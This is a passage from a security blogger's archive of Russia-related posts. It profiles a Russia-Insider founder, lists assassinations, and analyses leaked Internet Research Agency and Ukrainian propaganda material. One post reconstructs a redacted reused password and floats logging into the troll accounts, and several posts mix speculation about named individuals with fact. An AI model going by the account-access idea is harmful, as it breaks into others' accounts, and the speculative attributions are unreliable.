Krypt3ia

(Greek: κρυπτεία / krupteía, from κρυπτός / kruptós, “hidden, secret things”)

Archive for the ‘Russia’ Category

Russia Insider: How A Connecticut Gold Coast Boy Grows Up To Be A Russian Troll

leave a comment »

I was recently looking at some stuff online about the Skripal case and came across this guy and his site through a link from an article. The article was on a guy who also has been evidently poisoned by Russia (biotoxin this time) in France but they make reference to Inside-Russia as they wrote about the case evidently. Anyway, the Inside Russia thing intrigued me because the guy who started the site and still runs it is from my neck of the woods (Greenwich Connecticut) on the gold coast as we call it here. Evidently Charles J. Bausman, a 53 year old American (ex… Patriot?) who now evidently lives in Russia, runs the propaganda site known as “Inside-Russia” and works in finance, or agro-business finance. At any rate, the site is quite the nest of pro Putin propagandist and antisemitism. In looking around I had to wonder just how a kid from Connecticut who went to a swank prep school here and Wesleyan University (somewhere I went for a summer) ended up a Russian propagandist front and allied with a couple oligarchs close to the Kremlin?

Bausman’s Resume in Cyrillic sent to an Oligarch in hopes of getting financing

Bausman say’s he was born in Germany in 64 and travelled a lot including a long stint in Russia (Moscow) when his father was on a “long business trip” which is to say that his father was bureau chief for the AP back in the old Sov days. John Bausman III was all over the place as an AP reporter but that time in Russia seems to have affected Charles quite a bit. I am not sure just when and how Charles became a Putin propagandist but the site he set up started in August 2014 and has been gaining momentum ever since. In doing all the background on Charles I had to wonder about his father, which, I could not find too much on other than his obit’s online.

I have to wonder just how his father felt about his son’s Soviet/Putin leanings after he started the site, which by the way, was registered with the house in Greenwich where they Bausman’s lived in Greenwich CT. As John was older, perhaps he did not really get to see the site or know much about it. Maybe he did and approved of his son’s leanings? I am not sure, but suffice to say that it may be their travels in the Baltics during the old days might have affected his young son profoundly. I can imagine that if he wasn’t home schooled, he may have been indoctrinated by the Soviet state in some way in his youth. I just don’t really know, but, the other thing that kinda crossed my mind again and again was what were John’s leanings on all this? Like father like son?

At any rate, the son is an out and out Putin “Praetorian” as the book “Putin’s Praetorians” claims and evidently Charles could not resist writing a review of it on Amazon. In fact Charles enjoys his titles as even on his Twitter feed, he boasts of being one of Louise Mensch’s “Russian Trolls” which is I have to say Amusing as I myself am blocked by her because she is an idiot hanger on of the jester. Anyway, if not a troll, what Charles is is, a propagandist tool. Or, I should really say a “would be” tool because he is not trying to hide his identity and is fairly open with his propaganda claptrap he is trying to sell the the conspiracy masses. His site is a “collective” of writers he says, but in looking at them only a few are named and one of them, Anatoly Karlin, is a straight out conspiracy Nazi connected apparatchik for Putin.

Now, on the account of this site being akin to the IRA, well, no that is not the case. However, the Twitter feed and the content is pretty popular and has been rising over the last couple years, peaking in January this year as everything went to hell concerning the RussiaGate story. I would not be surprised if anyone were to do some more mining and find that accounts proximal to the IRA Twitter accounts might have this on their feeds as well. While all of this spin and energy has been building though, Charles has been hungry for funds to continue his work, even though he is some kind of finance wizard according to all his degree work and jobs over the years with Russian banks and the like.

 

You can donate to Russia-Insider on their site and they take bitcoin and paypal as well as a couple other more obscure payment schemes. Evidently “citizen journalism” costs the big bucks! While his bitcoin wallet has had no transactions at all, I have to wonder just who is paying for his site and activities. In 2014, just after launching the site he exhorted Alexey Komov and Konstantin Malofeev that “I still need money!” which can be seen in the screen shots above from emails that I got from Shaltai Boltai’s dump of Malofeev’s email spool. I went through all seven hundred plus emails and found no more than those you see above. So it is unclear whether or not the Kremlin connected Komov and Malofeev ponied up money but they seemed amenable to it in the emails that I saw. I am going to assume that since the site is still up and that Bausman has added a slew of other domains, he has more plans and that he also got the funding to start. Only time will tell if he moves further and activates the other sites that he owns.

As you can see, if he had it his way, perhaps Russia-Insider would not be the only “insider” site that he could be spreading propaganda with. It is interesting to note that the countries he has chosen to create domains for are all ones that the Russian state would be interested in targeting propaganda at. I am not really sure what the “Cadmus” site would be all about but if you know your history, Cadmus was a slayer of monsters in the Greek pantheon. So far none of these sites has ever had content on them so there is nothing to see.. yet. Maybe if Charles gets his money he will someday have a media empire eh?

Overall, this guy is no clear and present danger but he is one of the lights in the constellation that is RU apologist propaganda. He isn’t RT or Sputnik just yet but he has ambitions to be I think. What really just makes me wonder is, as I said at the top, how does this kid go from US citizen to Russian propagandist? So many unanswered questions on this one for me. Was his father enamored with the Soviet state in the 60’s and 70’s? I mean it was no pleasure dome out there at that time no matter what the Soviet state would like you to think. Of course some might see Wesleyan and think that the left leaning’s of the school would only entice a youth to become more liberal, but jeez, I mean this guy is full on nutbaggy! Also, this guy still has everything listed in America as ownership goes! The Russia-Insider site before being set to privacy still has his parents place listed as the address! Choose a country dude.

Well, that’s about it on this one. Just a little heads up on this guy and a bit of background. I kind of have a yen to drive down to Greenwich and visit the Russia-Insider HQ just for shits and giggles. If anyone else has any tidbits they care to drop on me use the Protonmail acct. Until next time, keep watching these whacknuts.

Dos vidanya,

K.

Written by Krypt3ia

2018/03/19 at 18:46

Follow The Trail of Dead Russians

with 2 comments

On September 7th 1978 Georgi Markov, a Bulhgarian defector and vocal opponent of the Bulgarian regime felt a pinch of what he thought was a bug bite on his thigh as he walked across the Waterloo Bridge in London England. Four days later after a fever started that day on the bridge, Georgi was dead from what would be discovered as a Ricin attack using a small pellet of refined Ricin injected into his system by an umbrella created and used by the KGB. Of course this assassination was carried out by both Bulgaria and the KGB, but it was the KGB who planned the operation and insured it worked.

This event was the first time I had been cognizant of a KGB assassination in the UK back in the day and in light of recent events, it seems what is old is new again in London and with the Putin KGB regime in Russia. The latest assassination using dangerous nerve toxin was even more dangerous and brazen in that, as we understand it today, the deployment of the Novichok agent was likely either in the form of a spray (puff) aimed at the Skripal’s or it was a dusting of objects or places in the public by the KGB (and yes, it’s the KGB, always will be in my book. Nothing has changed but the name of the org) Though it has yet to be revealed just how the KGB operatives deployed the nerve agent, it is important to note that back in the day it seems that the KGB at least took more care to not have collateral damage with innocent bystanders possibly being killed with the umbrella device as opposed to the anything goes style of the Skripal assassination. This post is about the change in aggression and sloppiness by Putin and his KGB minions and what is motivating these attacks and methods.

 

Putin’s Putsch

Since I am not sure how many of you are familiar of how Putin rose to power, I will just highlight the fact that he came to power as the inside KGB man that he was. When Yeltsin finally fell apart Putin made his move. Or, more to the point perhaps Putin helped Yeltsin fall apart and made his move. Granting a “pardon” of sorts to Yeltsin he took over the presidency and his regime began in earnest December 31st 1999. It is an interesting fact that Putin himself was under investigation for corruption as well, but soon after the take over the investigation was dropped. Since then, Putin has consolidated power, side stepped the Russian rules of law concerning the presidency, and carried out his desires on making Russia Great Again. Along the way Putin has amassed what is considered possibly to be the largest amount of wealth held by one person, annexed other countries territories, and of late, brazenly attacked another sovereign nations electoral system to sow chaos and potentially install a friendly entity at it’s head, or at least one that is beholden to him.

Putin has pushed the envelope and no one has stopped him. NATO cannot, the US was the bulwark against an unchecked Russia, but now that is no more. This is an important factor that will play out below but you have to understand the players and the dynamic of the game to realize just what is happening here with the assassination of Skripal and it’s political import. We are living through a time where the shift seems to be occurring where China and Russia are becoming the super powers and the US is steadily losing, if not already has lost, it’s seat at the super power table at least politically if not literally. Putin has directly affected our policy in Trumps winning the presidency and now he is empowered. This empowerment will only lead to more attacks on the US and anywhere else he deems he wants to destabilize.

Putin’s Assassinations

Let’s go back though and look at the assassinations that we know the Putin regime carried out.

Yuri Shchekochikhin, 2003: Shchekochikhin died suddenly on 3 July 2003 after a mysterious 16-day illness. It was officially declared though that he died from an allergic Lyell’s syndrome. His medical treatment and his post-mortem were held secret by state security though.

Sergei Yushenkov, 2003: Sergei Yushenkov was shot dead near his house in Moscow on 17 April 2003, just hours after finally obtaining the registrations needed for his Liberal Russia party to participate in the December 2003 parliamentary election

Paul Klebnikov 2004: On July 9, 2004, while leaving the Forbes office, Klebnikov was attacked on a Moscow street late at night by unknown assailants who fired at him from a slowly moving car. Klebnikov was shot four times and initially survived, but he died at the hospital after being transported in an ambulance that had no oxygen bottle and the hospital elevator that was taking him to the operating room broke down.

Anna Politkovskaya, 2006: Shot dead in the elevator of her apartment block in central Moscow

Alexander Litvinenko, 2006: On 1 November 2006, Litvinenko suddenly fell ill. His illness was later attributed to poisoning with radionuclide polonium-210 after the Health Protection Agency found significant amounts of the rare and highly toxic element in his body. This was deployed in a cup of tea by two Russian assets of the Putin regime.

Sergei Magnitsky, 2009: n 16 November, eight days before he would have had to have been released if he were not brought to trial, Magnitsky died. Prison officials at first attributed his death to a “rupture to the abdominal membrane” and later to a heart attack. It was later reported however that Magnitsky had died from being beaten and tortured by several officers of the Russian Ministry of Interior.

Natalia Estemirova, 2009: Estemirova was abducted on 15 July 2009 from her home in Grozny, Chechnya. Two witnesses reportedly saw Estemirova being pushed into a car shouting that she was being abducted. Lokshina said Estemirova was abducted as she was working on “extremely sensitive” cases of human rights abuses in Chechnya.

Stanislav Markelov 2009: Markelov was shot to death on 19 January 2009 while leaving a news conference in Moscow less than half a mile from the Kremlin; he was 34. Anastasia Baburova, a journalist for Novaya Gazeta who tried to come to Markelov’s assistance, was also shot and killed in the attack.

Anastasia Baburova, 2009: Russian law enforcement authorities declared that Baburova was shot in the back of her head. Baburova died a few hours after the attack at a Moscow hospital

Boris Berezovsky, 2013: On 23 March 2013, Berezovsky was found dead at his home, Titness Park, at Sunninghill, near Ascot in Berkshire. His body was found by a bodyguard in a locked bathroom, with a ligature around his neck. hen Berezovsky’s death became known, there was speculation by mainstream British news media that Moscow might be somehow involved. The Thames Valley Police classified his death as “unexplained” and launched a formal investigation into the circumstances behind it. There are still some questions on this case.

Boris Nemtsov, 2015: Just before midnight (at 23:40 GMT+3) on 27 February 2015, Nemtsov was shot several times from behind as he was crossing the Bolshoy Moskvoretsky Bridge in Moscow, close to the Kremlin walls and Red Square (55.7495°N 37.62421°E). He died at the scene. A convenient dump truck obscured the surveillance cameras on the bridge when the event occurred.

Sergei Viktorovich Skripal 2018: On 4 March 2018, Skripal and his 33-year-old daughter Yulia, who was visiting from Moscow, were found in a catatonic state on a public bench near a shopping centre in Salisbury by a passing doctor and nurse. Paramedics took them to Salisbury District Hospital where medical staff determined that the pair had been poisoned with a nerve agent (Novichok)

This list is just the one’s we know about, those who directly opposed Putin, I am sure there are others out there without names who disappeared as well. In looking at these assassinations, many of them in country, they are pretty brutal and straight forward. However, with the operations outside the countries where Putin has influence he had to get a bit more creative. Thus we have the polonium poisoning of Litvinenko and now Sergei Skripal with a nerve agent. Notice also that both of these guys were former secret services people (KGB/FSB/GRU) and as such, their acts of defection or opposition are seen by Putin as the ultimate insult. Putin you see, does not forgive or forget those who worked for the state turning their backs on him or the state. So, since these former operatives made Putin mad, he decided to do away with them in a very public and dastardly way. Dying of nerve agent or being poisoned by polonium are both painful ways to die and certainly send a message to anyone else who might cross Putin.

Lack of Response

Post the assassination of Skripal though, I fear that Putin will only become more brazen in his assassinations outside the greater confines of Russia. I say this because post election of Trump and the chaos that has been sown with his election as well as the BREXIT by the UK, the world is fairly unstable and factional. In the case of Skripal as well as Livinenko, it seems that the UK may be somewhat hard pressed to have a response against Russia that would mean anything. In fact, given the reaction this week by Theresa May on this incident, it is clear that the UK wants to do something but is unsure exactly what they can do because of Russia’s heavy investment in England as a whole. Add to this that the US and Trump specifically, seem unable or unwilling to respond to the actions of Putin and his regime and you can see how impotent the UK may in fact be in response to an overt act of criminality on their shores by Russia. It remains to be seen just what the UK will do in response to this attack but I for one hope that they do act, even if it is just a sting to Putin’s ego if anything.

Will the UK eject the Residentura?

Will they sanction certain players?

Will they go after Putin’s money?

Time will tell…

Dynamic Changes (Trump)

Meanwhile, all of this, the ability and the gumption for Putin to carry out these attacks is directly possible because of the election and inaction of Trump and the US government. By interfering in our election and potentially getting Trump elected by the active measures campaigns of 2015-2016 Putin has destabilized our ability to react. In fact, it may even be said that he has nulled out our ability to react because he has kompromat on the president himself and thus he knows that Trump will not act substantively against him. At worst this is the case, at best it is Trump’s own inability to govern that allows for Putin to go unchecked. As we move along with the special prosecutor’s case being made, we may eventually see just what happened in the Trump campaign and whether or not there is kompromat on him and others within his inner circle. However, as the spectacle continues Putin will have free reign to wreak havoc as he see’s fit, and that includes assassinating former assets with impunity that might still threaten his regime or just piss him off.

Please do note that it is likely this is just the tip of the iceberg yet to be seen. As we move forward there may be other assets who will be assassinated like this. Recently in fact there have been rumblings that there is also a hit out on anyone involved with the Steel dossier and that includes an intimation that Steel himself is a current target of opportunity for the KGB assassins. There is furthermore allegations and insinuations that Skripal actually was an active asset and in fact had a hand in the dossier as well. If this is the case then you can also say that the motives for assassination of Skripal would be two fold; one, don’t talk and two, this is what happens if you do. Now that there seems to be little that the US is willing to do and other countries seem to be groping for answers, Putin will live in the slack space and carry out more of these until he is satisfied.

Are We Headed To A US Assassination?

So what’s next? Do we think that this assassination will be the last? Do we really believe that there won’t be an assassination to come on US territory? I for one think that if Trump is allowed to erode our abilities to respond further, there may come a time when someone here will suddenly die of some kind of poison. What would be the response if this happened? Would the Republicans finally come out of their Trumpian stupor? I have been thinking about this for a while and honestly this all kind of scares me. Will Putin feel so secure that he would pull something like this here in the United States?

Time will tell…

If you have anything to do with saying anything against Putin you best watch what you ingest, touch, breathe, well, just live in a hazmat suit.

K.

 

UPDATE:

I was reminded by two comments on here about these two suspicious deaths in the US

1) Mikhail Lesin; Putin’s media tsar who died in The Dupont Circle Hotel Washington DC 11/5/2015

2) Vitaly Churkin, embassador to the UN from Russia who died in NYC in 2017

Both of these have had no autopsy records released and both seemed to maybe have had heart attacks… Maybe… In the case of Lesin he was VERY close to Putin BUT he was in trouble with the FED’s here because of his excesses financially. I figure that Lesin got the whack because he was a threat to Putin were he to have financial kompromat on him by the US.

Now, are these two assassinations? Well, the government would have to say something on that account I think for me, but, it is really convenient that at least Levin died when he did huh?

Written by Krypt3ia

2018/03/13 at 14:13

Posted in KGB, Putin, Russia

Why I don’t Allow Reporters On My Feed

leave a comment »

Recently I posted about the Russian Troll Farm’s data being on sale for more than a year on joker.buzz, an auction site for RU hackers most likely to be affiliated with Shaltai Boltai (humpy dumpty). I went through the dump looking for metadata and to backstop the screen shots that were on the site as part of the proofs that the data was legit. In doing so I managed to find out quite a bit more on the infrastructure, players, and accounts that the SVR had set up to carry out the active measures campaign against the US election in 2016. Now having been a security researcher blogger all these years I certainly expect that others may see a story and write their own and often times this happens with a link back to my post if it is germane. However, in this case it kinda seems like Beast and the reporters who wrote the two pieces on their site saw my post and decided that they would just say they had “discovered” the joker.buzz site and the data for their own clickbait desires.

Post 1

Post 2

The fact of the matter is that Beast didn’t discover anything, if anyone discovered the story it was insider.ru who posted the story in Russia on the 21st of February. I cited them in my post as well as the joker.buzz url that the Insider piece had linked in the article February 21st. So no Daily Beast and “reporters” thereof, you did not discover this nor did you even have the decency to link back to either pieces in your story. I find it funny how I post on February 26th and four days later the Beast is claiming to have “found” this site and the juicy data. What’s even worse is that Beast just goes on about accounts and tracking them back to people while the real story should be that the data is genuine, it shows more of the inner workings of the troll farm aside from the accounts on Reddit and other places, and that either an insider had been selling the data or they had been hacked for over a year and we all missed it.

At first I griped a bit on Twitter about this but I was willing to let it go until one of the editors at Beast wanted in on my Twitter feed all of a sudden. I allowed it and watched for a couple days. They did not attempt to reach out at all so now I am pretty sure they were fishing for more to rip off of my site or my feed and possibly claim it as their own “investigative journalism” cum click bait. This was the last straw, and with a word from another reporter who exhorted me to do a write up about this.. Well here I am writing this piece that I am kind of ambivalent about. I don’t want to come off as just some asshole saying “I DID IT FIRST!” but the fact of the matter is that this has happened on more than one occasion and of late more so (looking at you Franklin Foer on that Atlantic article on Manafort)

So, Beast, at least credit the Russian’s (insider.ru) for seeing this first and reporting on it even if you can’t bring yourselves to link back to my post which I am pretty sure was the tip off to what you claimed you “discovered” In fact, you should really do your own research and stop leeching off of others you yellow journalism hacks. Shit, you even really didn’t do a good job at parsing all the data in those screen shots! You really have not added to the knowledge base here on the Russia investigation.. But you sure did re-create the “Penny Dreadfuls” of the 19th century!

K.

Written by Krypt3ia

2018/03/05 at 17:43

The Insider and The IRA Data That’s Been On Auction For Over A Year

leave a comment »

Today a tweet was directed at me concerning some new information posted on a Russian news site back on February 21st that no one in the US media seems to have noticed nor the NATSEC community. In fact, I had not seen this and I kinda have chided myself for not paying better attention to the Joker Buzz site that the data was for sale on, for a year! I had actually been on their site(s) in the clearnet and darknet and thought I had posted a blog about the notion of the site and what they sell but I can’t seem to locate it. I guess maybe I just tweeted about it and moved on …My bad.

Anyway, the post on The Insider has the skinny on how a user there named “AlexDA” had ALL of the IRA’s internal documents on the active measures campaign for sale for over a year and no one really took notice. This means that we could have bought the data and had all of the actors, their data, and their METADATA if we had only seen or purchased them back in January/February 2017. What’s more is that had we had this intelligence in the open much more could have been easily available for the general public to be aware of how this was all working and what to look for. Of course now after the Indictment by Mueller of the 13 entities the op has been completely blown and the infrastructure is likely not to be operational, but, we could see operational details and OPSEC mistakes that the players made and extend that to the upcoming years election cycle and Russian influence and active measures campaigns to come right?

Even so, big things are in the small details even within the offering itself that AlexDA is making on JokerBuzz. I have been going through the images from the auction site that Alex put up to entice and prove that they are legit and here is what I have found by doing my thing as usual mining:

Proxy IP Space Used:

In the offering images you can see that AlexDA tried to obfuscate the last couple octets but if you look real hard you can see the numbers pop up. Of course if you just take the first two or three octets and you put that into Google you can see what pops right up. So, the first thing to see is that the service mentioned in the indictment is actually Total Server Solutions LLC out of Plano Texas. I would like to call your attention to how much “Texas” was involved in many of the Twitter and facebook accounts that were super patriotic. It was mentioned in the indictment that they rented the server space to appear that they were in the US. Well, there you have it kids. The data fits and it makes sense that they would try to do this to appear as if they were in the US to fool first pass looking right? I ran an Nmap of the /24 and as you can see if you look, there are some proxies, port 80 and 22 open but none are available to access at this time, so maybe they went back to being just space owned by Total server… I would hope though that those there servers had been, ya know, collected on by subpoena by the FBI right?

Wink wink nudge nudge.

 

Meanwhile, there’s a bunch of servers/IP’s listed in the images as well that are in Russia using port 8888. I haven’t looked at those with Nmap but they are VPS as well so maybe they are still in play. Suffice to say though, it is interesting data and could lead to more things coming to light if you look into them a little further. If you want to play the home game please feel free. I will be circling back over this stuff in the near future and enlightenment will be posted here when I have it for you all.

Alias and Users To Search:

Gee, look at all those aliases man! I have yet to dig into these and I am sure some are already known but you now too can play the home game! Take a look and see what histories you can find on these accounts/nicks. I am willing to bet we can put together quite the timeline and then use that as data to look at future attacks as well. All those Blacktivist accounts though were the appetizer to what I saw next in the screen shots. Alex gives us a whole thing to work with in the image below and if you start digging on that you can get some good stuff.

 

http://aktivnyye.com/t/20171013-blackmattersus.html

Nolan Hack, a name that I believe others have seen in the press accounts, has a Facebook page, a phone number, and a site blackmattersus.com that is in fact still live but not updated since 2017 it seems. His Facebook is live still as well (Why no take down Facecult?) I looked up his details on there and the blackmatersus site and what I came back with was a cell phone out of california marked as a bad number and a site that has been around since 2015 that was registered anonymously and kept so throughout the time it has been up.

http://aktivnyye.com/t/20171013-blackmattersus.html

I am sure with more digging on the name (Nolan Hack *amusing*) I can put together more of the breadcrumb trail to show the cutout’s actions. Maybe in a post to come, but suffice to say that this data also is legit and tracks with everything we have been told by the IC and the news up to today on the active measures by the IRA.

Passwords:

Amazingly enough in the screen shots given on the jokerbuzz site you can also see where Alex tried to remove at least half the passwords in a couple posts. I immediately knew what the password was because, I mean, come on! The phrase “Greed is good” is a classic line from Wall Street and Gordon Gekko. If you look close enough at these images though you can make out the lower part of the G so you know it is that. Now we have to work backwords on those accounts and get the full data in order to attempt top maybe log into them and see what intel we can gather from them (see below for lower part of the g) It also amusing to see that these guys were sloppy and re-using passwords in various accounts. If we get the accounts right I am betting we could own them all and gather much more insight.

Greedisgood…. You guys amuse me.

Illegals Names and drop sites:

In amongst all the stuff is also an address and name where drops were made in NV used by the IRA and more likely the illegals who were in country. The address comes back to a known bad drop/company in NV that has a history of being used for Ebay scams. The cutout name of Gneeda Harris has zero history on first pass but I will look again and dig a little more. Maybe I can turn up something more on this ID but at the very least we have something more to work with than what the special counsel decided to drop on us.

Maybe the FBI can check this place out and see if they have had DVR’d video surveillance? Maybe this dead drop is still live? Are there still illegals in country that have been told to sleep? I wonder…

Metadata:

Lastly, or near the last thing I will cover here on this is the metadata. I used wget to pull down the jokerbuzz site and in the folder for the page of the auction are the screen caps used. Pulling those down and then running them through the old EXIF scan you can see that these captures were done September 28th and 29th 2016. The time stamp says +3hrs and that as of today they were done 1 year 4 months 28 days ago. So, back in September 2016, this data was in the hands of AlexDA and ostensibly about to be put up on Jokerbuzz. This means that either someone on the INSIDE decided to sell out the operation because they knew they were blown and wanted some cash, OR, someone hacked them and downloaded all this shit making the screen shots in September for the jokerbuzz auction. This in tandem with all the backstopping I just did shows that this data is legit and it has been on sale for at least a year and no one knew or was clued in enough to say anything about it.

Who is AlexDA?

Lastly, who is AlexDA? How did they get this data and what is the motive here other than money? Money mind you that they did not get in over a year as the auction timed out and NO ONE bought it. Now, I have been looking at who this may be and there is a case to be made that this dump came from Shaltai Boltai (humpty dumpty) a group that is now broken up due to arrests but has one last player on the loose. That player is in fact a guy named Alexander Glazastikov who has not been caught and may in fact be AlexDA. I will also point to the fact that if you look at the Jokerbuzz auctions there are a number of them from Shaltai Boltai offering all kinds of interesting data leaked from Russian operations. So, it is my guess that this is the case but just an educated one. I for one would like to have a conversation with AlexDA and see just how much he wants for the dump now that it has not sold in over a year. Maybe we all can crowdsource it?

Summing Up:

Anywho, this is what I found just by looking at the details here in the auction post. Imagine what we could have if we actually had all the documents? Hell, I would love to get my hands on them, prize out all the details and then pass it along to the feds. The data is legit, it has been around for a year online, and we all missed it man!

Hey AlexDA, you wanna just gimme that data for free feel free to reach out to my protonmail acct!

More stuff when I have it kids.

K.

Written by Krypt3ia

2018/02/26 at 22:55

Russian Active Measures: Propaganda, Targeted Ad’s, and The Mob

leave a comment »

Handbook of Russian Information Warfare 2016

 

With all the talking heads on CNN expounding on the ad buy’s in Rubles and the oblique presentments by the senators yesterday on the Russia collusion investigation on C-Span, I felt the needs to drop some knowledge. All of these measures are not new but it seems like the general populace, the government, and the media all cannot comprehend that fact. Propaganda has been around since the dawn of civitas and today it is just more able to be used more nimbly in our hyper-connected society. With the advent of social media, the use of propaganda has been been turned into a more precision tool using demographics, analytics, and a medium that engenders itself as a new asymmetric warfare tool and this should be no surprise to anyone.

Propaganda has long been a tool for the radio, print, and television media to be paid and or tricked into releasing content that serves one of the political masters out there. However, the new wrinkle is the heuristics of computing and social dynamics data thereof of all the data points that we now collect on everyone who is using the internet or sites like Facebook, Google, or Twitter. So much information is collected today that it is possible to accurately determine how a person thinks and acts given their preferences and their secret activities that are seen by the algorithms inside these systems. Unless someone today takes greater pains to obfuscate their activities, companies, and governments can easily mine that data for ammunition to create such things as the black propaganda we saw used in the 2016 election cycle here. Since people really don’t pay attention to the other countries out there, they too would have seen the same measures used in places like Ukraine if they had been paying attention.

Previously I had posted about such measures in Ukraine that included the whole cloth creation of a media company to manipulate the populace there with propaganda as well as the use of malware to spy on the populace. Today I am covering the precepts of the use of our own systems of social media as well as our collective group psychologies to sow chaos. Given the outcomes in the 2016 elections and the continued attacks on our psyche’s by Russia post election we now have a pretty good idea of how the dynamic works. One must though take into account that human nature plays the largest roll in this type of warfare for it is the base of the equation that the Russians are trying to manipulate. The targeting of ads to key states and cities was just a targeting mechanism to the overall more targeted PSYOPS operation that was at play. The Russians parlayed the divisions within the US by creating echoes within already nascent echo chambers for those who are of like minds on social media systems. Once the psychology was worked out it was just a matter of locating those pockets of people and then creating the media (e.g. fake news) to feed into those systems and agitate those people into a frenzy.

Once again, human nature was keenly leveraged to sow chaos as well as being a vehicle for those noise to signal messages (dog whistles) for the believers and I can appreciate that. Frankly I am in awe of the techniques used while at the same time I am concerned that there are no real ways to mitigate these kinds of attacks due to that said same human nature. We all have our bias’ and we all ascribe to our own echo chambers whether we do so consciously or not. Social media in itself is the perfect medium for this and we just fall into place as the lizard brain takes over. So when people today ask the questions around how to combat this type of thing I often say that there is no real way to stop it. We can of course use people to look at ads like Facebook is doing now, having hired or in the process of hiring thousands to do so. Or we could just look at the ad buys and insure that they are not being paid for in Rubles… But these means are clunky and the adversary has many other options so in the end it will not work.

The ongoing Senate investigation into collusion and the Russian active measures campaign in 2016 has many people also asking specifically about the targeting data. Did the targeting data come from the Trump organization? Well, yeah, it may well have come from them or it could have just been collated from online searches and a working knowledge of the electoral system. You see, this attack was simple enough to calculate if you wanted to attempt to win the electoral college. One can Google the states that are key to winning the electoral vote but it is the fact that it seems the targeting went down to actual names and addresses that matters. I for one would be asking Cambridge Analytica about that data and how it may have come into the possession of the Russians. Now it is possible that the Russians had their own parallel program for this, or it is also possible they hacked into Analytica for it, and as far as I am aware of no one has asked for a forensic analysis of CA’s security there. Of course the data could have been handed off by someone like Paul Manafort as a quid pro quo (black caviar) right? Or perhaps it was Jared as a means of paying off his Russian friends in hopes of a loan to cover his bad real estate debts? I also think that it is possible that the rolls hacking that happened in the same time frame could also be the answer to this. It is possible that all those rolls were copied, sifted, and used for targeting of propaganda at the final stage of the race to the White House.

At the end of the day though, the problems of social media, cognitive biases within the populace and the mob mentality that humans tend to fall into (Republican/Democrat/TeaParty) will not be going away. We are creatures of habit and limited by our own brain biology. Do not expect that knowing that there is a propaganda campaign will stop those willing to receive it from buying into it whole heartedly. Social media isn’t going away anytime soon and the idea of algorithms being the key to stopping this is a falsehood. It all really just matters how you consume this media and how you react to it. If you fall into the echo chamber of cognitive bias or bent, then you will likely become a part of that machine and not be able to separate the truths from the bias truths that you personally ascribe to. So when you all ask how this happened remember that we are the culprits, the people.

K.

Written by Krypt3ia

2017/10/05 at 14:51

RULEAKS: Russian Media and Disinformation in Ukraine by the DNR-ONLINE

with 3 comments

INTRODUCTION:

Back in December I located a dump of data on the darknet placed there by a hacker collective in Ukraine called RUH8. The dump is rather good sized and all come from Russian backed Ukraine sources. RUH8’s dumped one group in particular that I was interested in because I located a piece of malware in the email spool that, once run through the usual tests, showed to be something not widely seen before. I will cover the malware further down the article and will include IOC’s but once I harvested the email spool itself and began to get things translated things got even more interesting.

Once I mirrored the site I got some help from <REDACTED> and set to work in translation of emails and documents attachments. Most of the bulk of the dump is average emails concerning daily business but a few began to tell a tale of the company that the emails came from and how it was in fact a Russian front organization created for propaganda in Ukraine and used to manipulate the populace in the Donetsk People’s Republic (The Russian separatist area of Ukraine) and those outside it including other countries outside of Ukraine.

Having all of this come to light just after the election win for Trump, and now coming out here in the midst of the Russian intervention and collusion investigations today, I thought this report would be prescient and give a rare insight into how the Russian propaganda machine works, how the intelligence apparatus of Russia works in this respect, and perhaps bring to light a new piece of malware for everyone to see.

THE LEAK:

The leak by RUH8 in the darknet consists od more than a few entities email spools as well as individuals that they have described as assets of Russia. In the case of this post the data comes from the domain dir-online.ru. This is a media org in Ukraine that is Russian backed and as I said before caters to the Donetsk People’s Republic. Within the dump there are many documents covering the day to day but five documents stood out amongst them all (frankly there are more to be analyzed and one needs Russian speakers to translate them all) as being all things shady.

RUH8 is also the group that hacked and dumped “The Grey Cardinal’s” email spool as well. Having gone through that spool I did not find any malware of merit or anything that was new so I moved on in mirroring and checking for goodies. They keep adding content to the site too so I would expect eventually I will locate some more goodies in the future. Keep an eye on the blog for more when I find it. The Grey Cardinal though is an interesting figure and I recommend you all read up on him as well.

THE PROPAGANDA PLAN:

Right, well on to the good stuff! The following documents found in this dump show Russia’s machinations at propaganda in Ukraine, well, at least this small slice of it.

DOC1

From Translator: This talks about “anti-Russian hysteria” in the media and about disinformation and fake news that makes Russia look bad. And also that pro-Russian voices are accused of being agents of the Kremlin. To counter this, this document outlines a project to create a pro-Kremlin media campaign in the Ukraine that includes a budget for hiring journalists and buying equipment like computers and voice recorders, a budget for freelancers and “insiders”, Website hosting, web administrators, editors, advertising, The amounts — which are, for some reason, in US Dollars, are $9,250 for initial set-up expenses, and $38,280 ongoing costs. Those could be monthly costs — the salary of a full-time journalist is listed at $2,000, and that’s likely to be $2,000 a month.  The editor in chief, who’ll be based in Kiev, will get $2,500 a month. Hey, their freelance budget is $6,000 a month! 

DOC2

From Translator: is a little disturbing, since it outlines how the anti-war movement in the Ukraine can be used for pro-Russian purposes. For example, the idea is to create a picture of the leaders in Kremlin as corrupt power-grabbers who are using the war in eastern Ukraine to distract everyone from their own problems. Russia’s invasion of eastern Ukraine is just misformation from Kiev. Sounds totally legit.

Oh, and I figure out why it’s all in US Dollars. Hah, this is funny. Way back when I was based in Russia — something like 20 years ago, when the Soviet Union had just collapsed, inflation was rampant. Stores had to change the prices on all their products several times a day! To deal with it, they all switched to using Dollars or Euros instead, the traitors! To fix the problem, instead of fixing the economy, the Russian government outlawed the use of foreign currencies on prices. So what the stores did was switch to using something called the “arbitrary unit” — which just happened to be worth as much as the dollar, by pure coincidence. Ever since then, this “arbitrary unit” has been the default price. It particularly convenient during inflationary periods, or when dealing with local currencies in different republics. Plus, everyone knows what it means. So, in this document, they use the term “arbitrary unit” and in others, they seem to have just used the dollar symbol instead.

Also, I can confirm that the ongoing expenses are per month — they spelled that out in this budget.

So anyway, this is another juicy document. They’ve put together a budget for running a fake anti-war grassroots organization.

Initial costs are $79,200 for things like computer equipment, recruiting, registering domain names and getting business and media licenses, and website design. It’s interesting that in both this budget and the previous one I looked at, they’re careful to get all the permits and licenses in place. They might be trying to undermine the government of a foreign country, but at least they’ve got all their paperwork in order!
Then the ongoing expenses are $86,000 and include salaries for regular contributors and freelancers, salaries for editorial managers and copyeditors, a financial manager and their deputy, $2,000 for a lawyer, $20,000 for online advertising, and $10,000 for promotion on social media like Facebook and VKontakte (Russia’s LinkedIn).  

They’re expecting 100,000 unique visitors a day on weekdays.

